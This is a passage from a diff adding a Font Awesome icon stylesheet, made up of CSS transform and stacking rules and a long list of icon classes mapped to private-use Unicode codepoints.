+} +.fa-flip-vertical { + -ms-filter: 'progid:DXImageTransform.Microsoft.BasicImage(rotation=2, mirror=1)'; + -webkit-transform: scale(1, -1); + -ms-transform: scale(1, -1); + transform: scale(1, -1); +} +:root .fa-rotate-90, +:root .fa-rotate-180, +:root .fa-rotate-270, +:root .fa-flip-horizontal, +:root .fa-flip-vertical { + filter: none; +} +.fa-stack { + position: relative; + display: inline-block; + width: 2em; + height: 2em; + line-height: 2em; + vertical-align: middle; +} +.fa-stack-1x, +.fa-stack-2x { + position: absolute; + left: 0; + width: 100%; + text-align: center; +} +.fa-stack-1x { + line-height: inherit; +} +.fa-stack-2x { + font-size: 2em; +} +.fa-inverse { + color: #ffffff; +} +/* Font Awesome uses the Unicode Private Use Area (PUA) to ensure screen + readers do not read off random characters that represent icons */ +.fa-glass:before { + content: '\f000'; +} +.fa-music:before { + content: '\f001'; +} +.fa-search:before { + content: '\f002'; +} +.fa-envelope-o:before { + content: '\f003'; +} +.fa-heart:before { + content: '\f004'; +} +.fa-star:before { + content: '\f005'; +} +.fa-star-o:before { + content: '\f006'; +} +.fa-user:before { + content: '\f007'; +} +.fa-film:before { + content: '\f008'; +} +.fa-th-large:before { + content: '\f009'; +} +.fa-th:before { + content: '\f00a'; +} +.fa-th-list:before { + content: '\f00b'; +} +.fa-check:before { + content: '\f00c'; +} +.fa-remove:before, +.fa-close:before, +.fa-times:before { + content: '\f00d'; +} +.fa-search-plus:before { + content: '\f00e'; +} +.fa-search-minus:before { + content: '\f010'; +} +.fa-power-off:before { + content: '\f011'; +} +.fa-signal:before { + content: '\f012'; +} +.fa-gear:before, +.fa-cog:before { + content: '\f013'; +} +.fa-trash-o:before { + content: '\f014'; +} +.fa-home:before { + content: '\f015'; +} +.fa-file-o:before { + content: '\f016'; +} +.fa-clock-o:before { + content: '\f017'; +} +.fa-road:before { + content: '\f018'; +} +.fa-download:before { + content: '\f019'; +} +.fa-arrow-circle-o-down:before { + content: '\f01a'; +} +.fa-arrow-circle-o-up:before { + content: '\f01b'; +} +.fa-inbox:before { + content: '\f01c'; +} +.fa-play-circle-o:before { + content: '\f01d'; +} +.fa-rotate-right:before, +.fa-repeat:before { + content: '\f01e'; +} +.fa-refresh:before { + content: '\f021'; +} +.fa-list-alt:before { + content: '\f022'; +} +.fa-lock:before { + content: '\f023'; +} +.fa-flag:before { + content: '\f024'; +} +.fa-headphones:before { + content: '\f025'; +} +.fa-volume-off:before { + content: '\f026'; +} +.fa-volume-down:before { + content: '\f027'; +} +.fa-volume-up:before { + content: '\f028'; +} +.fa-qrcode:before { + content: '\f029'; +} +.fa-barcode:before { + content: '\f02a'; +} +.fa-tag:before { + content: '\f02b'; +} +.fa-tags:before { + content: '\f02c'; +} +.fa-book:before { + content: '\f02d'; +} +.fa-bookmark:before { + content: '\f02e'; +} +.fa-print:before { + content: '\f02f'; +} +.fa-camera:before { + content: '\f030'; +} +.fa-font:before { + content: '\f031'; +} +.fa-bold:before { + content: '\f032'; +} +.fa-italic:before { + content: '\f033'; +} +.fa-text-height:before { + content: '\f034'; +} +.fa-text-width:before { + content: '\f035'; +} +.fa-align-left:before { + content: '\f036'; +} +.fa-align-center:before { + content: '\f037'; +} +.fa-align-right:before { + content: '\f038'; +} +.fa-align-justify:before { + content: '\f039'; +} +.fa-list:before { + content: '\f03a'; +} +.fa-dedent:before, +.fa-outdent:before { + content: '\f03b'; +} +.fa-indent:before { + content: '\f03c'; +} +.fa-video-camera:before { + content: '\f03d'; +} +.fa-photo:before, +.fa-image:before, +.fa-picture-o:before { + content: '\f03e'; +} +.fa-pencil:before { + content: '\f040'; +} +.fa-map-marker:before { + content: '\f041'; +} +.fa-adjust:before { + content: '\f042'; +} +.fa-tint:before { + content: '\f043'; +} +.fa-edit:before, +.fa-pencil-square-o:before { + content: '\f044'; +} +.fa-share-square-o:before { + content: '\f045'; +} +.fa-check-square-o:before { + content: '\f046'; +} +.fa-arrows:before { + content: '\f047'; +} +.fa-step-backward:before { + content: '\f048'; +} +.fa-fast-backward:before { + content: '\f049'; +} +.fa-backward:before { + content: '\f04a'; +} +.fa-play:before { + content: '\f04b'; +} +.fa-pause:before { + content: '\f04c'; +} +.fa-stop:before { + content: '\f04d'; +} +.fa-forward:before { + content: '\f04e'; +} +.fa-fast-forward:before { + content: '\f050'; +} +.fa-step-forward:before { + content: '\f051'; +} +.fa-eject:before { + content: '\f052'; +} +.fa-chevron-left:before { + content: '\f053'; +} +.fa-chevron-right:before { + content: '\f054'; +} +.fa-plus-circle:before { + content: '\f055'; +} +.fa-minus-circle:before { + content: '\f056'; +} +.fa-times-circle:before { + content: '\f057'; +} +.fa-check-circle:before { + content: '\f058'; +} +.fa-question-circle:before { + content: '\f059'; +} +.fa-info-circle:before { + content: '\f05a'; +} +.fa-crosshairs:before { + content: '\f05b'; +} +.fa-times-circle-o:before { + content: '\f05c'; +} +.fa-check-circle-o:before { + content: '\f05d'; +} +.fa-ban:before { + content: '\f05e'; +} +.fa-arrow-left:before { + content: '\f060'; +} +.fa-arrow-right:before { + content: '\f061'; +} +.fa-arrow-up:before { + content: '\f062'; +} +.fa-arrow-down:before { + content: '\f063'; +} +.fa-mail-forward:before, +.fa-share:before { + content: '\f064'; +} +.fa-expand:before { + content: '\f065'; +} +.fa-compress:before { + content: '\f066'; +} +.fa-plus:before { + content: '\f067'; +} +.fa-minus:before { + content: '\f068'; +} +.fa-asterisk:before { + content: '\f069'; +} +.fa-exclamation-circle:before { + content: '\f06a'; +} +.fa-gift:before { + content: '\f06b'; +} +.fa-leaf:before { + content: '\f06c'; +} +.fa-fire:before { + content: '\f06d'; +} +.fa-eye:before { + content: '\f06e'; +} +.fa-eye-slash:before { + content: '\f070'; +} +.fa-warning:before, +.fa-exclamation-triangle:before { + content: '\f071'; +} +.fa-plane:before { + content: '\f072'; +} +.fa-calendar:before { + content: '\f073'; +} +.fa-random:before { + content: '\f074'; +} +.fa-comment:before { + content: '\f075'; +} +.fa-magnet:before { + content: '\f076'; +} +.fa-chevron-up:before { + content: '\f077'; +} +.fa-chevron-down:before { + content: '\f078'; +} +.fa-retweet:before { + content: '\f079'; +} +.fa-shopping-cart:before { + content: '\f07a'; +} +.fa-folder:before { + content: '\f07b'; +} +.fa-folder-open:before { + content: '\f07c'; +} +.fa-arrows-v:before { + content: '\f07d'; +} +.fa-arrows-h:before { + content: '\f07e'; +} +.fa-bar-chart-o:before, +.fa-bar-chart:before { + content: '\f080'; +} +.fa-twitter-square:before { + content: '\f081'; +} +.fa-facebook-square:before { + content: '\f082'; +} +.fa-camera-retro:before { + content: '\f083'; +} +.fa-key:before { + content: '\f084'; +} +.fa-gears:before, +.fa-cogs:before { + content: '\f085'; +} +.fa-comments:before { + content: '\f086'; +} +.fa-thumbs-o-up:before { + content: '\f087'; +} +.fa-thumbs-o-down:before { + content: '\f088'; +} +.fa-star-half:before { + content: '\f089'; +} +.fa-heart-o:before { + content: '\f08a'; +} +.fa-sign-out:before { + content: '\f08b'; +} +.fa-linkedin-square:before { + content: '\f08c'; +} +.fa-thumb-tack:before { + content: '\f08d'; +} +.fa-external-link:before { + content: '\f08e'; +} +.fa-sign-in:before { + content: '\f090'; +} +.fa-trophy:before { + content: '\f091'; +} +.fa-github-square:before { + content: '\f092'; +} +.fa-upload:before { + content: '\f093'; +} +.fa-lemon-o:before { + content: '\f094'; +} +.fa-phone:before { + content: '\f095'; +} +.fa-square-o:before { + content: '\f096'; +} +.fa-bookmark-o:before { + content: '\f097'; +} +.fa-phone-square:before { + content: '\f098'; +} +.fa-twitter:before { + content: '\f099'; +} +.fa-facebook-f:before, +.fa-facebook:before { + content: '\f09a'; +} +.fa-github:before { + content: '\f09b'; +} +.fa-unlock:before { + content: '\f09c'; +} +.fa-credit-card:before { + content: '\f09d'; +} +.fa-feed:before, +.fa-rss:before { + content: '\f09e'; +} +.fa-hdd-o:before { + content: '\f0a0'; +} +.fa-bullhorn:before { + content: '\f0a1'; +} +.fa-bell:before { + content: '\f0f3'; +} +.fa-certificate:before { + content: '\f0a3'; +} +.fa-hand-o-right:before { + content: '\f0a4'; +} +.fa-hand-o-left:before { + content: '\f0a5'; +} +.fa-hand-o-up:before { + content: '\f0a6'; +} +.fa-hand-o-down:before { + content: '\f0a7'; +} +.fa-arrow-circle-left:before { + content: '\f0a8'; +} +.fa-arrow-circle-right:before { + content: '\f0a9'; +} +.fa-arrow-circle-up:before { + content: '\f0aa'; +} +.fa-arrow-circle-down:before { + content: '\f0ab'; +} +.fa-globe:before { + content: '\f0ac'; +} +.fa-wrench:before { + content: '\f0ad'; +} +.fa-tasks:before { + content: '\f0ae'; +} +.fa-filter:before { + content: '\f0b0'; +} +.fa-briefcase:before { + content: '\f0b1'; +} +.fa-arrows-alt:before { + content: '\f0b2'; +} +.fa-group:before, +.fa-users:before { + content: '\f0c0'; +} +.fa-chain:before, +.fa-link:before { + content: '\f0c1'; +} +.fa-cloud:before { + content: '\f0c2'; +} +.fa-flask:before { + content: '\f0c3'; +} +.fa-cut:before, +.fa-scissors:before { + content: '\f0c4'; +} +.fa-copy:before, +.fa-files-o:before { + content: '\f0c5'; +} +.fa-paperclip:before { + content: '\f0c6'; +} +.fa-save:before, +.fa-floppy-o:before { + content: '\f0c7'; +} +.fa-square:before { + content: '\f0c8'; +} +.fa-navicon:before, +.fa-reorder:before, +.fa-bars:before { + content: '\f0c9'; +} +.fa-list-ul:before { + content: '\f0ca'; +} +.fa-list-ol:before { + content: '\f0cb'; +} +.fa-strikethrough:before { + content: '\f0cc'; +} +.fa-underline:before { + content: '\f0cd'; +} +.fa-table:before { + content: '\f0ce'; +} +.fa-magic:before { + content: '\f0d0'; +} +.fa-truck:before { + content: '\f0d1'; +} +.fa-pinterest:before { + content: '\f0d2'; +} +.fa-pinterest-square:before { + content: '\f0d3'; +} +.fa-google-plus-square:before { + content: '\f0d4'; +} +.fa-google-plus:before { + content: '\f0d5'; +} +.fa-money:before { + content: '\f0d6'; +} +.fa-caret-down:before { + content: '\f0d7'; +} +.fa-caret-up:before { + content: '\f0d8'; +} +.fa-caret-left:before { + content: '\f0d9'; +} +.fa-caret-right:before { + content: '\f0da'; +} +.fa-columns:before { + content: '\f0db'; +} +.fa-unsorted:before, +.fa-sort:before { + content: '\f0dc'; +} +.fa-sort-down:before, +.fa-sort-desc:before { + content: '\f0dd'; +} +.fa-sort-up:before, +.fa-sort-asc:before { + content: '\f0de'; +} +.fa-envelope:before { + content: '\f0e0'; +} +.fa-linkedin:before { + content: '\f0e1'; +} +.fa-rotate-left:before, +.fa-undo:before { + content: '\f0e2'; +} +.fa-legal:before, +.fa-gavel:before { + content: '\f0e3'; +} +.fa-dashboard:before, +.fa-tachometer:before { + content: '\f0e4'; +} +.fa-comment-o:before { + content: '\f0e5'; +} +.fa-comments-o:before { + content: '\f0e6'; +} +.fa-flash:before, +.fa-bolt:before { + content: '\f0e7'; +} +.fa-sitemap:before { + content: '\f0e8'; +} +.fa-umbrella:before { + content: '\f0e9'; +} +.fa-paste:before, +.fa-clipboard:before { + content: '\f0ea'; +} +.fa-lightbulb-o:before { + content: '\f0eb'; +} +.fa-exchange:before { + content: '\f0ec'; +} +.fa-cloud-download:before { + content: '\f0ed'; +} +.fa-cloud-upload:before { + content: '\f0ee'; +} +.fa-user-md:before { + content: '\f0f0'; +} +.fa-stethoscope:before { + content: '\f0f1'; +} +.fa-suitcase:before { + content: '\f0f2'; +} +.fa-bell-o:before { + content: '\f0a2'; +} +.fa-coffee:before { + content: '\f0f4'; +} +.fa-cutlery:before { + content: '\f0f5'; +} +.fa-file-text-o:before { + content: '\f0f6'; +} +.fa-building-o:before { + content: '\f0f7'; +} +.fa-hospital-o:before { + content: '\f0f8'; +} +.fa-ambulance:before { + content: '\f0f9'; +} +.fa-medkit:before { + content: '\f0fa'; +} +.fa-fighter-jet:before { + content: '\f0fb'; +} +.fa-beer:before { + content: '\f0fc'; +} +.fa-h-square:before { + content: '\f0fd'; +} +.fa-plus-square:before { + content: '\f0fe'; +} +.fa-angle-double-left:before { + content: '\f100'; +} +.fa-angle-double-right:before { + content: '\f101'; +} +.fa-angle-double-up:before { + content: '\f102'; +} +.fa-angle-double-down:before { + content: '\f103'; +} +.fa-angle-left:before { + content: '\f104'; +} +.fa-angle-right:before { + content: '\f105'; +} +.fa-angle-up:before { + content: '\f106'; +} +.fa-angle-down:before { + content: '\f107'; +} +.fa-desktop:before { + content: '\f108'; +} +.fa-laptop:before { + content: '\f109'; +} +.fa-tablet:before { + content: '\f10a'; +} +.fa-mobile-phone:before, +.fa-mobile:before { + content: '\f10b'; +} +.fa-circle-o:before { + content: '\f10c'; +} +.fa-quote-left:before { + content: '\f10d'; +} +.fa-quote-right:before { + content: '\f10e'; +} +.fa-spinner:before { + content: '\f110'; +} +.fa-circle:before { + content: '\f111'; +} +.fa-mail-reply:before, +.fa-reply:before { + content: '\f112'; +} +.fa-github-alt:before { + content: '\f113'; +} +.fa-folder-o:before { + content: '\f114'; +} +.fa-folder-open-o:before { + content: '\f115'; +} +.fa-smile-o:before { + content: '\f118'; +} +.fa-frown-o:before { + content: '\f119'; +} +.fa-meh-o:before { + content: '\f11a'; +} +.fa-gamepad:before { + content: '\f11b'; +} +.fa-keyboard-o:before { + content: '\f11c'; +} +.fa-flag-o:before { + content: '\f11d'; +} +.fa-flag-checkered:before { + content: '\f11e'; +} +.fa-terminal:before { + content: '\f120'; +} +.fa-code:before { + content: '\f121'; +} +.fa-mail-reply-all:before, +.fa-reply-all:before { + content: '\f122'; +} +.fa-star-half-empty:before, +.fa-star-half-full:before, +.fa-star-half-o:before { + content: '\f123'; +} +.fa-location-arrow:before { + content: '\f124'; +} +.fa-crop:before { + content: '\f125'; +} +.fa-code-fork:before { + content: '\f126'; +} +.fa-unlink:before, +.fa-chain-broken:before { + content: '\f127'; +} +.fa-question:before { + content: '\f128'; +} +.fa-info:before { + content: '\f129'; +} +.fa-exclamation:before { + content: '\f12a'; +} +.fa-superscript:before { + content: '\f12b'; +} +.fa-subscript:before { + content: '\f12c'; +} +.fa-eraser:before { + content: '\f12d'; +} +.fa-puzzle-piece:before { + content: '\f12e'; +} +.fa-microphone:before { + content: '\f130'; +} +.fa-microphone-slash:before { + content: '\f131'; +} +.fa-shield:before { + content: '\f132'; +} +.fa-calendar-o:before { + content: '\f133'; +} +.fa-fire-extinguisher:before { + content: '\f134'; +} +.fa-rocket:before { + content: '\f135'; +} +.fa-maxcdn:before { + content: '\f136'; +} +.fa-chevron-circle-left:before { + content: '\f137'; +} +.fa-chevron-circle-right:before { + content: '\f138'; +} +.fa-chevron-circle-up:before { + content: '\f139'; +} +.fa-chevron-circle-down:before { + content: '\f13a'; +} +.fa-html5:before { + content: '\f13b'; +} +.fa-css3:before { + content: '\f13c'; +} +.fa-anchor:before { + content: '\f13d'; +} +.fa-unlock-alt:before { + content: '\f13e'; +} +.fa-bullseye:before { + content: '\f140'; +} +.fa-ellipsis-h:before { + content: '\f141'; +} +.fa-ellipsis-v:before { + content: '\f142'; +} +.fa-rss-square:before { + content: '\f143'; +} +.fa-play-circle:before { + content: '\f144'; +} +.fa-ticket:before { + content: '\f145'; +} +.fa-minus-square:before { + content: '\f146'; +} +.fa-minus-square-o:before { + content: '\f147'; +} +.fa-level-up:before { + content: '\f148'; +} +.fa-level-down:before { + content: '\f149'; +} +.fa-check-square:before { + content: '\f14a'; +} +.fa-pencil-square:before { + content: '\f14b'; +} +.fa-external-link-square:before { + content: '\f14c'; +} +.fa-share-square:before { + content: '\f14d'; +} +.fa-compass:before { + content: '\f14e'; +} +.fa-toggle-down:before, +.fa-caret-square-o-down:before { + content: '\f150'; +} +.fa-toggle-up:before, +.fa-caret-square-o-up:before { + content: '\f151'; +} +.fa-toggle-right:before, +.fa-caret-square-o-right:before { + content: '\f152'; +} +.fa-euro:before, +.fa-eur:before { + content: '\f153'; +} +.fa-gbp:before { + content: '\f154'; +} +.fa-dollar:before, +.fa-usd:before { + content: '\f155'; +} +.fa-rupee:before, +.fa-inr:before { + content: '\f156'; +} +.fa-cny:before, +.fa-rmb:before, +.fa-yen:before, +.fa-jpy:before { + content: '\f157'; +} +.fa-ruble:before, +.fa-rouble:before, +.fa-rub:before { + content: '\f158'; +} +.fa-won:before, +.fa-krw:before { + content: '\f159'; +} +.fa-bitcoin:before, +.fa-btc:before { + content: '\f15a'; +} +.fa-file:before { + content: '\f15b'; +} +.fa-file-text:before { + content: '\f15c'; +} +.fa-sort-alpha-asc:before { + content: '\f15d'; +} +.fa-sort-alpha-desc:before { + content: '\f15e'; +} +.fa-sort-amount-asc:before { + content: '\f160'; +} +.fa-sort-amount-desc:before { + content: '\f161'; +} +.fa-sort-numeric-asc:before { + content: '\f162'; +} +.fa-sort-numeric-desc:before { + content: '\f163'; +} +.fa-thumbs-up:before { + content: '\f164'; +} +.fa-thumbs-down:before { + content: '\f165'; +} +.fa-youtube-square:before { + content: '\f166'; +} +.fa-youtube:before { + content: '\f167'; +} +.fa-xing:before { + content: '\f168'; +} +.fa-xing-square:before { + content: '\f169'; +} +.fa-youtube-play:before { + content: '\f16a'; +} +.fa-dropbox:before { + content: '\f16b'; +} +.fa-stack-overflow:before { + content: '\f16c'; +} +.fa-instagram:before { + content: '\f16d'; +} +.fa-flickr:before { + content: '\f16e'; +} +.fa-adn:before { + content: '\f170'; +} +.fa-bitbucket:before { + content: '\f171'; +} +.fa-bitbucket-square:before { + content: '\f172'; +} +.fa-tumblr:before { + content: '\f173'; +} +.fa-tumblr-square:before { + content: '\f174'; +} +.fa-long-arrow-down:before { + content: '\f175'; +} +.fa-long-arrow-up:before { + content: '\f176'; +} +.fa-long-arrow-left:before { + content: '\f177'; +} +.fa-long-arrow-right:before { + content: '\f178'; +} +.fa-apple:before { + content: '\f179'; +} +.fa-windows:before { + content: '\f17a'; +} +.fa-android:before { + content: '\f17b'; +} +.fa-linux:before { + content: '\f17c'; +} +.fa-dribbble:before { + content: '\f17d'; +} +.fa-skype:before { + content: '\f17e'; +} +.fa-foursquare:before { + content: '\f180'; +} +.fa-trello:before { + content: '\f181'; +} +.fa-female:before { + content: '\f182'; +} +.fa-male:before { + content: '\f183'; +} +.fa-gittip:before, +.fa-gratipay:before { + content: '\f184'; +} +.fa-sun-o:before { + content: '\f185'; +} +.fa-moon-o:before { + content: '\f186'; +} +.fa-archive:before { + content: '\f187'; +} +.fa-bug:before { + content: '\f188'; +} +.fa-vk:before { + content: '\f189'; +} +.fa-weibo:before { + content: '\f18a'; +} +.fa-renren:before { + content: '\f18b'; +} +.fa-pagelines:before { + content: '\f18c'; +} +.fa-stack-exchange:before { + content: '\f18d'; +} +.fa-arrow-circle-o-right:before { + content: '\f18e'; +} +.fa-arrow-circle-o-left:before { + content: '\f190'; +} +.fa-toggle-left:before, +.fa-caret-square-o-left:before { + content: '\f191'; +} +.fa-dot-circle-o:before { + content: '\f192'; +} +.fa-wheelchair:before { + content: '\f193'; +} +.fa-vimeo-square:before { + content: '\f194'; +} +.fa-turkish-lira:before, +.fa-try:before { + content: '\f195'; +} +.fa-plus-square-o:before { + content: '\f196'; +} +.fa-space-shuttle:before { + content: '\f197'; +} +.fa-slack:before { + content: '\f198'; +} +.fa-envelope-square:before { + content: '\f199'; +} +.fa-wordpress:before { + content: '\f19a'; +} +.fa-openid:before { + content: '\f19b'; +} +.fa-institution:before, +.fa-bank:before, +.fa-university:before { + content: '\f19c'; +} +.fa-mortar-board:before, +.fa-graduation-cap:before { + content: '\f19d'; +} +.fa-yahoo:before { + content: '\f19e'; +} +.fa-google:before { + content: '\f1a0'; +} +.fa-reddit:before { + content: '\f1a1'; +} +.fa-reddit-square:before { + content: '\f1a2'; +} +.fa-stumbleupon-circle:before { + content: '\f1a3'; +} +.fa-stumbleupon:before { + content: '\f1a4'; +} +.fa-delicious:before { + content: '\f1a5'; +} +.fa-digg:before { + content: '\f1a6'; +} +.fa-pied-piper-pp:before { + content: '\f1a7'; +} +.fa-pied-piper-alt:before { + content: '\f1a8'; +} +.fa-drupal:before { + content: '\f1a9'; +} +.fa-joomla:before { + content: '\f1aa'; +} +.fa-language:before { + content: '\f1ab'; +} +.fa-fax:before { + content: '\f1ac'; +} +.fa-building:before { + content: '\f1ad'; +} +.fa-child:before { + content: '\f1ae'; +} +.fa-paw:before { + content: '\f1b0'; +} +.fa-spoon:before { + content: '\f1b1'; +} +.fa-cube:before { + content: '\f1b2'; +} +.fa-cubes:before { + content: '\f1b3'; +} +.fa-behance:before { + content: '\f1b4'; +} +.fa-behance-square:before { + content: '\f1b5'; +} +.fa-steam:before { + content: '\f1b6'; +} +.fa-steam-square:before { + content: '\f1b7'; +} +.fa-recycle:before { + content: '\f1b8'; +} +.fa-automobile:before, +.fa-car:before { + content: '\f1b9'; +} +.fa-cab:before, +.fa-taxi:before { + content: '\f1ba'; +} +.fa-tree:before { + content: '\f1bb'; +} +.fa-spotify:before { + content: '\f1bc'; +} +.fa-deviantart:before { + content: '\f1bd'; +} +.fa-soundcloud:before { + content: '\f1be'; +} +.fa-database:before { + content: '\f1c0'; +} +.fa-file-pdf-o:before { + content: '\f1c1'; +} +.fa-file-word-o:before { + content: '\f1c2'; +} +.fa-file-excel-o:before { + content: '\f1c3'; +} +.fa-file-powerpoint-o:before { + content: '\f1c4'; +} +.fa-file-photo-o:before, +.fa-file-picture-o:before, +.fa-file-image-o:before { + content: '\f1c5'; +} +.fa-file-zip-o:before, +.fa-file-archive-o:before { + content: '\f1c6'; +} +.fa-file-sound-o:before, +.fa-file-audio-o:before { + content: '\f1c7'; +} +.fa-file-movie-o:before, +.fa-file-video-o:before { + content: '\f1c8'; +} +.fa-file-code-o:before { + content: '\f1c9'; +} +.fa-vine:before { + content: '\f1ca'; +} +.fa-codepen:before { + content: '\f1cb'; +} +.fa-jsfiddle:before { + content: '\f1cc'; +} +.fa-life-bouy:before, +.fa-life-buoy:before, +.fa-life-saver:before, +.fa-support:before, +.fa-life-ring:before { + content: '\f1cd'; +} +.fa-circle-o-notch:before { + content: '\f1ce'; +} +.fa-ra:before, +.fa-resistance:before, +.fa-rebel:before { + content: '\f1d0'; +} +.fa-ge:before, +.fa-empire:before { + content: '\f1d1'; +} +.fa-git-square:before { + content: '\f1d2'; +} +.fa-git:before { + content: '\f1d3'; +} +.fa-y-combinator-square:before, +.fa-yc-square:before, +.fa-hacker-news:before { + content: '\f1d4'; +} +.fa-tencent-weibo:before { + content: '\f1d5'; +} +.fa-qq:before { + content: '\f1d6'; +} +.fa-wechat:before, +.fa-weixin:before { + content: '\f1d7'; +} +.fa-send:before, +.fa-paper-plane:before { + content: '\f1d8'; +} +.fa-send-o:before, +.fa-paper-plane-o:before { + content: '\f1d9'; +} +.fa-history:before { + content: '\f1da'; +} +.fa-circle-thin:before { + content: '\f1db'; +} +.fa-header:before { + content: '\f1dc'; +} +.fa-paragraph:before { + content: '\f1dd'; +} +.fa-sliders:before { + content: '\f1de'; +} +.fa-share-alt:before { + content: '\f1e0'; +} +.fa-share-alt-square:before { + content: '\f1e1'; +} +.fa-bomb:before { + content: '\f1e2'; +} +.fa-soccer-ball-o:before, +.fa-futbol-o:before { + content: '\f1e3'; +} +.fa-tty:before { + content: '\f1e4'; +} +.fa-binoculars:before { + content: '\f1e5'; +} +.fa-plug:before { + content: '\f1e6'; +} +.fa-slideshare:before { + content: '\f1e7'; +} +.fa-twitch:before { + content: '\f1e8'; +} +.fa-yelp:before { + content: '\f1e9'; +} +.fa-newspaper-o:before { + content: '\f1ea'; +} +.fa-wifi:before { + content: '\f1eb'; +} +.fa-calculator:before { + content: '\f1ec'; +} +.fa-paypal:before { + content: '\f1ed'; +} +.fa-google-wallet:before { + content: '\f1ee'; +} +.fa-cc-visa:before { + content: '\f1f0'; +} +.fa-cc-mastercard:before { + content: '\f1f1'; +} +.fa-cc-discover:before { + content: '\f1f2'; +} +.fa-cc-amex:before { + content: '\f1f3'; +} +.fa-cc-paypal:before { + content: '\f1f4'; +} +.fa-cc-stripe:before { + content: '\f1f5'; +} +.fa-bell-slash:before { + content: '\f1f6'; +} +.fa-bell-slash-o:before { + content: '\f1f7'; +} +.fa-trash:before { + content: '\f1f8'; +} +.fa-copyright:before { + content: '\f1f9'; +} +.fa-at:before { + content: '\f1fa'; +} +.fa-eyedropper:before { + content: '\f1fb'; +} +.fa-paint-brush:before { + content: '\f1fc'; +} +.fa-birthday-cake:before { + content: '\f1fd'; +} +.fa-area-chart:before { + content: '\f1fe'; +} +.fa-pie-chart:before { + content: '\f200'; +} +.fa-line-chart:before { + content: '\f201'; +} +.fa-lastfm:before { + content: '\f202'; +} +.fa-lastfm-square:before { + content: '\f203'; +} +.fa-toggle-off:before { + content: '\f204'; +} +.fa-toggle-on:before { + content: '\f205'; +} +.fa-bicycle:before { + content: '\f206'; +} +.fa-bus:before { + content: '\f207'; +} +.fa-ioxhost:before { + content: '\f208'; +} +.fa-angellist:before { + content: '\f209'; +} +.fa-cc:before { + content: '\f20a'; +} +.fa-shekel:before, +.fa-sheqel:before, +.fa-ils:before { + content: '\f20b'; +} +.fa-meanpath:before { + content: '\f20c'; +} +.fa-buysellads:before { + content: '\f20d'; +} +.fa-connectdevelop:before { + content: '\f20e'; +} +.fa-dashcube:before { + content: '\f210'; +} +.fa-forumbee:before { + content: '\f211'; +} +.fa-leanpub:before { + content: '\f212'; +} +.fa-sellsy:before { + content: '\f213'; +} +.fa-shirtsinbulk:before { + content: '\f214'; +} +.fa-simplybuilt:before { + content: '\f215'; +} +.fa-skyatlas:before { + content: '\f216'; +} +.fa-cart-plus:before { + content: '\f217'; +} +.fa-cart-arrow-down:before { + content: '\f218'; +} +.fa-diamond:before { + content: '\f219'; +} +.fa-ship:before { + content: '\f21a'; +} +.fa-user-secret:before { + content: '\f21b'; +} +.fa-motorcycle:before { + content: '\f21c'; +} +.fa-street-view:before { + content: '\f21d'; +} +.fa-heartbeat:before { + content: '\f21e'; +} +.fa-venus:before { + content: '\f221'; +} +.fa-mars:before { + content: '\f222'; +} +.fa-mercury:before { + content: '\f223'; +} +.fa-intersex:before, +.fa-transgender:before { + content: '\f224'; +} +.fa-transgender-alt:before { + content: '\f225'; +} +.fa-venus-double:before { + content: '\f226'; +} +.fa-mars-double:before { + content: '\f227'; +} +.fa-venus-mars:before { + content: '\f228'; +} +.fa-mars-stroke:before { + content: '\f229'; +} +.fa-mars-stroke-v:before { + content: '\f22a'; +} +.fa-mars-stroke-h:before { + content: '\f22b'; +} +.fa-neuter:before { + content: '\f22c'; +} +.fa-genderless:before { + content: '\f22d'; +} +.fa-facebook-official:before { + content: '\f230'; +} +.fa-pinterest-p:before { + content: '\f231'; +} +.fa-whatsapp:before { + content: '\f232'; +} +.fa-server:before { + content: '\f233'; +} +.fa-user-plus:before { + content: '\f234'; +} +.fa-user-times:before { + content: '\f235'; +} +.fa-hotel:before, +.fa-bed:before { + content: '\f236'; +} +.fa-viacoin:before { + content: '\f237'; +} +.fa-train:before { + content: '\f238'; +} +.fa-subway:before { + content: '\f239'; +} +.fa-medium:before { + content: '\f23a'; +} +.fa-yc:before, +.fa-y-combinator:before { + content: '\f23b'; +} +.fa-optin-monster:before { + content: '\f23c'; +} +.fa-opencart:before { + content: '\f23d'; +} +.fa-expeditedssl:before { + content: '\f23e'; +} +.fa-battery-4:before, +.fa-battery:before, +.fa-battery-full:before { + content: '\f240'; +} +.fa-battery-3:before, +.fa-battery-three-quarters:before { + content: '\f241'; +} +.fa-battery-2:before, +.fa-battery-half:before { + content: '\f242'; +} +.fa-battery-1:before, +.fa-battery-quarter:before { + content: '\f243'; +} +.fa-battery-0:before, +.fa-battery-empty:before { + content: '\f244'; +} +.fa-mouse-pointer:before { + content: '\f245'; +} +.fa-i-cursor:before { + content: '\f246'; +} +.fa-object-group:before { + content: '\f247'; +} +.fa-object-ungroup:before { + content: '\f248'; +} +.fa-sticky-note:before { + content: '\f249'; +} +.fa-sticky-note-o:before { + content: '\f24a'; +} +.fa-cc-jcb:before { + content: '\f24b'; +} +.fa-cc-diners-club:before { + content: '\f24c'; +} +.fa-clone:before { + content: '\f24d'; +} +.fa-balance-scale:before { + content: '\f24e'; +} +.fa-hourglass-o:before { + content: '\f250'; +} +.fa-hourglass-1:before, +.fa-hourglass-start:before { + content: '\f251'; +} +.fa-hourglass-2:before, +.fa-hourglass-half:before { + content: '\f252'; +} +.fa-hourglass-3:before, +.fa-hourglass-end:before { + content: '\f253'; +} +.fa-hourglass:before { + content: '\f254'; +} +.fa-hand-grab-o:before, +.fa-hand-rock-o:before { + content: '\f255'; +} +.fa-hand-stop-o:before, +.fa-hand-paper-o:before { + content: '\f256'; +} +.fa-hand-scissors-o:before { + content: '\f257'; +} +.fa-hand-lizard-o:before { + content: '\f258'; +} +.fa-hand-spock-o:before { + content: '\f259'; +} +.fa-hand-pointer-o:before { + content: '\f25a'; +} +.fa-hand-peace-o:before { + content: '\f25b'; +} +.fa-trademark:before { + content: '\f25c'; +} +.fa-registered:before { + content: '\f25d'; +} +.fa-creative-commons:before { + content: '\f25e'; +} +.fa-gg:before { + content: '\f260'; +} +.fa-gg-circle:before { + content: '\f261'; +} +.fa-tripadvisor:before { + content: '\f262'; +} +.fa-odnoklassniki:before { + content: '\f263'; +} +.fa-odnoklassniki-square:before { + content: '\f264'; +} +.fa-get-pocket:before { + content: '\f265'; +} +.fa-wikipedia-w:before { + content: '\f266'; +} +.fa-safari:before { + content: '\f267'; +} +.fa-chrome:before { + content: '\f268'; +} +.fa-firefox:before { + content: '\f269'; +} +.fa-opera:before { + content: '\f26a'; +} +.fa-internet-explorer:before { + content: '\f26b'; +} +.fa-tv:before, +.fa-television:before { + content: '\f26c'; +} +.fa-contao:before { + content: 